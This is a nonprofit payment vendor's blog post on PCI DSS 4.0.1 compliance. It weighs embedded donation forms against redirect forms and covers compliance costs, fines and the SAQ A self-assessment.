Follow along as we talk about the donor experience, new rules, fundraising, and hefty fines. While PCI compliance isn’t the most exciting subject, online donations are a critical source of fundraising and there’s renewed security scrutiny as new regulations become mandatory.
As of March 31, 2025, PCI DSS 4.01 is the latest version of the Payment Card Industry Data Security Standard Council guidelines to keep donor data safe. The Council includes representatives from major card brands such as Visa, Mastercard, Discover, and American Express.
The PCI standards have always been issued to govern how organizations handle credit card payments. Their goal is to keep cardholder data safe. These standards are a critical series of regulations that are updated as new threats emerge and technology changes.
CharityEngine recently published an article on what nonprofits need to know about PCI 4.0. The article provides a comprehensive look at how nonprofits can keep donor data safe.
However, in this article, we will focus on one of the more nuanced rules and look ahead to educate our clients and other nonprofits.
We will focus on two types of forms: embedded forms and redirect forms.
When someone visits your website, one of two things likely happens. A form can be embedded as a module on the page or pop right up in front of the donor when they click a donate button…either is called an embedded form.
There are benefits to embedded forms:
Many CharityEngine clients use embedded forms with great success.
The other thing that can happen is that someone clicks the donate button and is taken off your website and to a new website. This is called a redirect.
Some studies suggest that dedicated donation pages are more attractive to donors making larger gifts, as the pages appear more trustworthy.
Until now, nonprofits could choose whichever form they preferred. However, some crafty criminals realized they could steal credit card data—not by accessing the form itself but by accessing the information surrounding it. By hijacking the scripts running on a page, like Google Analytics on the home page of a nonprofit website, they could access all data on that page.
PCI 4.0 means nonprofits are now on the hook for compliance when using embedded forms.
This is a drastic change that nonprofits using embedded forms must be aware of and prepared to manage. If your nonprofit uses embedded forms, it is at risk of PCI noncompliance.
The payment processor, whether CharityEngine, Stripe, or someone else, is responsible for the form itself. If the form has a Google Pay button, Google is responsible for that.
However, the nonprofit is responsible for everything else on that page. This applies to every page on your website with an embedded form.
Moving forward, nonprofit processes will have to adapt.
The easiest solution is to choose a redirect form to avoid the headache and expense of compliance.
Embedded forms themselves are not risky.
Do they have improved conversion rates? Potentially, but not drastically higher than dedicated donation pages (remember, our clients use both!). They do offer a smoother donor experience and some clients prefer them.
That experience must simply now be weighed against the responsibility of compliance.
PCI compliance isn’t a joke or something to be taken lightly. While it’s not likely someone will be knocking on your door immediately if you slip up, the consequences for noncompliance are harsh and, in some cases, irreparable.
While it varies, there will be costs associated with scanning your website, documenting compliance, and rectifying any issues that arise.
Between IT expenses, documentation requirements, and third-party scanning services, we estimate that the annual maintenance required to comply with these new embedded form requirements will cost around $800 to $1,200 a year for smaller websites with a few pages and could be as high as $5,000 or more for larger organizations with hundreds of webpages housing embedded forms.
Obviously, the worst consequence would be that your website is breached, your donor data is stolen, and your reputation is severely damaged. No nonprofit wants to be on the nightly news because of a data breach, and once donor trust is lost, it is very difficult to regain.
But there are real financial consequences if you’re just “caught.” Fines can range from $5,000 to $100,000 per month, depending on the severity of the violation and the length of the noncompliance. You can also face legal fees or even the inability to process credit card payments.
If you choose to use embedded forms and accept the responsibility of monitoring compliance, it must be taken seriously.
If you love your embedded forms and want to keep them, what’s next?
We will urge clients to complete Self-Assessment Questionnaire A (SAQ A) from PCI DSS. This form is designed for nonprofits that fully outsource payment processing to a PCI-compliant or certified provider, like CharityEngine.
You can find the current form on the PCI website.
We’ve examined the PCI guidelines closely and believe (no inside knowledge here) that they are moving toward hardening security in e-commerce. Technology and AI are advancing at warp speed and criminals are uncovering new vulnerabilities, leading to tightening security guidelines wherever possible.
For example, most of the " optional " guidelines before PCI 4.0.1 are now mandatory. We expect this trend to continue.
Again, this is not a call to burn embedded forms to the ground. It is a call to understand the risks and weigh those risks against the reward of an embedded form versus a redirect. If you accept the risk, you must also accept the responsibility.
At CharityEngine, we excel at helping nonprofits stay compliant and manage risk. If you'd like to talk about how we can help your nonprofit, just schedule a call with us.